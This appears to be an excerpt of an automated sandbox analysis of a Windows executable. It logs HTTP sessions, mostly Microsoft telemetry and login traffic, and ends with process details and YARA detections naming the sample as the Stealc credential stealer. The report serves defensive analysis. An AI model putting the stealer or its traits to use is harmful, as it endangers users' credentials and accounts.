                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        143192.168.2.54993613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:02 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                        x-ms-request-id: f77b0594-001e-0014-3c66-3b5151000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235001Z-178bfbc474bfw4gbhC1NYCunf400000000t0000000001dt3
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        144192.168.2.54993740.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:49:02 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_SN1
                                                                                                                                                                                                                                                        x-ms-request-id: e0f379ba-b8f5-44ca-9886-325e57baaa02
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002F918 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:01 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11409
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        145192.168.2.54993823.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC506OUTGET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC551INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 06:37:05 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 1437868
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: 35f8cf50-b6a5-4c74-ae05-da13e654185f
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 4096
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=326874
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 18:37:56 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:02 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC4096INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                        Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        146192.168.2.54993940.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:49:03 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: 75bd8eb2-827c-4318-be41-f9ecc75d8ec8
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D834 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:02 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11409
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        147192.168.2.54994013.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:03 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                        x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235003Z-178bfbc474bbcwv4hC1NYCypys00000000eg000000007mes
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        148192.168.2.54994113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:04 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:03 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                        x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235003Z-178bfbc474bvjk8shC1NYC83ns00000000dg000000004dyq
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        149192.168.2.54994313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:03 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:04 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                        x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235004Z-178bfbc474btrnf9hC1NYCb80g00000000tg00000000ut1h
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:18:49:03
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\E89hSGjVrv.exe"
                                                                                                                                                                                                                                                        Imagebase:0xb50000
                                                                                                                                                                                                                                                        File size:1'814'528 bytes
                                                                                                                                                                                                                                                        MD5 hash:D90A0FA7D1B136C6AAA035F6BC5602FA
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073713588.0000000005520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2588765991.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
